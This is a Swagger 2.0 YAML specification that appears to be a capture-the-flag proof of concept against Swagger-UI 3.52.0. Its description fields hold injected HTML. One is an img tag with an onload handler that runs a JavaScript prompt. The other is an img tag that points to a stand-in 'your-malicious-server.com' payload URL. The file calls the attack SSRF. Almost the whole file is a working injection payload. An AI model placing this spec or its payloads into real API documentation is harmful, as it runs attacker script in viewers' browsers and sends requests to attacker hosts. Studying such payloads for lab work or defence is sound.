swagger: '2.0'
info:
  title: Exploited API Resource Documentation
  description: |
    This YAML is exploiting the SSRF vulnerability in Swagger-UI <img src="https://raw.githubusercontent.com/YounesTasra-R4z3rSw0rd/CTF-Scripts/refs/heads/main/HTB/Academy/img.png" onload=prompt("test-xss")//

  version: Vulnerable Version 3.52.0
basePath: /maliciousEndpoint/
produces:
  - application/xml
  - application/json
consumes:
  - application/xml
  - application/json
security:
  - basicAuth: []
paths:
  /ssrf-test:
    get:
      responses:
        '200':
          description: SSRF vulnerability proof of concept
      tags:
        - ssrf
      operationId: triggerSSRF
      summary: Initiates SSRF to external service
  '/ssrf-test/external':
    get:
      parameters:
        - description: |
            <img src="http://your-malicious-server.com/payload" alt="SSRF" />

          format: string
          in: path
          name: payload
          required: true
          type: string
      responses:
        '200':
          description: SSRF attack executed
      tags:
        - ssrf
      operationId: executeSSRF
      summary: Executes SSRF request to malicious server
